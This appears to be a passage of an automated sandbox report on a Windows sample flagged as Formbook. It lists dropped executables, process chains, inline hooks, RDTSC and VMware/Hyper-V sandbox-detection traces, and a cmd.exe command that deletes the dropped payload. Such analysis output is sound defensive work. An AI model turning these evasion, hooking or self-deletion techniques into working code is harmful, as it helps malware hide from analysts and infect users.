            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: New_1007572_021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: New_1007572_021.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_5E87.tmp.exe.8.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_5E87.tmp.exe.8.drStatic PE information: Section .text
            Source: classification engineClassification label: mal100.troj.evad.winEXE@11/5@1/2
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeCode function: 8_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_1007572_021.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJump to behavior
            Source: New_1007572_021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\New_1007572_021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: New_1007572_021.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile read: C:\Users\user\Desktop\New_1007572_021.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\New_1007572_021.exe 'C:\Users\user\Desktop\New_1007572_021.exe'
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: New_1007572_021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New_1007572_021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe, 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: New_1007572_021.exe, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021.exe.0.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.New_1007572_021.exe.800000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.New_1007572_021.exe.800000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.0.New_1007572_021.exe.b50000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.2.New_1007572_021.exe.b50000.1.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021.exeStatic PE information: 0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D12C push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01097140 push edi; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01097814 push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109784D push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D075 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D0CB push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D0C2 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0108EDBC push edx; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109C443 push eax; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E4EE push ds; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048ED0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD12C push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C7140 push edi; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C7814 push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C784D push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD075 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD0CB push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD0C2 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031BEDBC push edx; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CC443 push eax; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE4EE push ds; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.40373413401
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exeJump to dropped file
            Source: C:\Users\user\Desktop\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeFile created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeRDTSC instruction interceptor: First address: 00000000010898E4 second address: 00000000010898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeRDTSC instruction interceptor: First address: 0000000001089B4E second address: 0000000001089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000031B98E4 second address: 00000000031B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000031B9B4E second address: 00000000031B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089A80 rdtsc
            Source: C:\Users\user\Desktop\New_1007572_021.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\New_1007572_021.exe TID: 6716Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\New_1007572_021.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000000B.00000000.771534648.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.767000909.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.771534648.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 0000000B.00000000.760088803.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089A80 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0108ACC0 LdrLoadDll,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049514FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049605AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049605AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04948DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0491A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AD30 mov eax, dword ptr fs:[00000030h]
